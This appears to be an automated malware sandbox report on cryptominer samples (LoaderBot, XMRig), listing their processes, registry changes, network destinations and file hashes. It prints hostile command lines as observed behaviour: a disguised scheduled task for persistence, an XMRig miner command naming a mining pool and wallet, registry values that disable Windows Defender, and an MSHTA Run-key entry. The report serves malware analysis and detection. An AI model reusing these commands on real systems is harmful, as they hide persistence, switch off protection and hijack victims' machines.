schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==
C:\Windows\system32\taskeng.exe
taskeng.exe {C3D27779-9F9E-400A-8C25-E38F8BB55C9F} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
Network
| Country | Destination | Domain | Proto |
| RU | 31.41.244.231:80 | tcp | |
| RU | 31.41.244.231:80 | tcp |
Files
memory/1176-54-0x0000000000000000-mapping.dmp
memory/1112-55-0x00000000003B0000-0x00000000009FF000-memory.dmp
memory/908-56-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-57-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-59-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-61-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-63-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-64-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-66-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-67-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-68-0x00000000FF27C6E0-mapping.dmp
memory/908-73-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/908-78-0x00000000FF220000-0x00000000FF3BF000-memory.dmp
memory/1112-79-0x00000000003B0000-0x00000000009FF000-memory.dmp
\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1012-83-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1012-85-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/1112-86-0x00000000003B0000-0x00000000009FF000-memory.dmp
memory/108-87-0x0000000002780000-0x0000000002DCF000-memory.dmp
\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/868-89-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/868-91-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/840-104-0x00000000FF27C6E0-mapping.dmp
memory/868-115-0x0000000000C70000-0x00000000012BF000-memory.dmp
memory/868-116-0x0000000000C70000-0x00000000012BF000-memory.dmp
\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1088-118-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
| MD5 | 9ec8bc3dbfdcfe1540bd3274181ae9bb |
| SHA1 | a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316 |
| SHA256 | 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942 |
| SHA512 | d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117 |
memory/1088-120-0x0000000000F00000-0x000000000154F000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220901-en
Max time kernel
152s
Max time network
149s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Usermode.exe" | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
"C:\Users\Admin\AppData\Local\Temp\Usermode.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\setup.exe" "C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping -n 3 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp" /SL5="$D0054,2411950,352768,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 86VwoTuZTDgF5trS4bcEkvXtoHhUySbTWaWD5K4chXXc6XEPtWSVJcB43EVa9fmhPwcXRDNJ1hY21QqQtH3MQShV1F4VWrX -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 8.253.135.112:80 | tcp | |
| US | 8.253.135.112:80 | tcp | |
| US | 13.107.21.200:443 | tcp | |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| NL | 104.80.225.205:443 | tcp | |
| US | 20.189.173.4:443 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp | |
| NL | 178.79.208.1:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
memory/4872-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
memory/4752-138-0x0000000000000000-mapping.dmp
memory/1264-135-0x0000000000000000-mapping.dmp
memory/1264-139-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4872-141-0x00000000009A0000-0x0000000000E50000-memory.dmp
memory/3092-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
C:\Users\Admin\AppData\Local\Temp\is-8B004.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
memory/2208-142-0x0000000000000000-mapping.dmp
memory/2208-148-0x0000000003370000-0x00000000033E7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\ISDone.dll
| MD5 | f26684a0b0999413be6751f335603471 |
| SHA1 | dcd054328740c4bbf00e11b0b8f00a00f311898d |
| SHA256 | 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890 |
| SHA512 | d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e |
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\ISDone.dll
| MD5 | f26684a0b0999413be6751f335603471 |
| SHA1 | dcd054328740c4bbf00e11b0b8f00a00f311898d |
| SHA256 | 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890 |
| SHA512 | d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e |
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\b2p.dll
| MD5 | ab35386487b343e3e82dbd2671ff9dab |
| SHA1 | 03591d07aea3309b631a7d3a6e20a92653e199b8 |
| SHA256 | c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2 |
| SHA512 | b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09 |
memory/2208-152-0x00000000035D0000-0x00000000035DF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
C:\Users\Admin\AppData\Local\Temp\is-H7L8E.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
memory/2208-153-0x0000000075530000-0x0000000075541000-memory.dmp
memory/1264-154-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4872-155-0x0000000005AB0000-0x0000000005B16000-memory.dmp
memory/2280-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
memory/2280-160-0x0000000140000000-0x0000000140CDE000-memory.dmp
memory/2280-159-0x00000000001D0000-0x00000000001E0000-memory.dmp
memory/2280-161-0x00000000004D0000-0x00000000004F0000-memory.dmp
memory/2280-162-0x0000000140000000-0x0000000140CDE000-memory.dmp
memory/2280-163-0x00000000004F0000-0x0000000000510000-memory.dmp
memory/2280-164-0x00000000004F0000-0x0000000000510000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
125s
Max time network
122s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\7za.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Windows\System32\WScript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")" | C:\Windows\System32\WScript.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\7za.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
| N/A | N/A | C:\Perform\nssm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Perform\Resources\NSudo.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 35 | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Perform\7za.exe | N/A |
| Token: 18446744065119617044 | N/A | C:\Perform\Resources\NSudo.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
| N/A | N/A | C:\Perform\update.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
C:\Windows\system32\cmd.exe
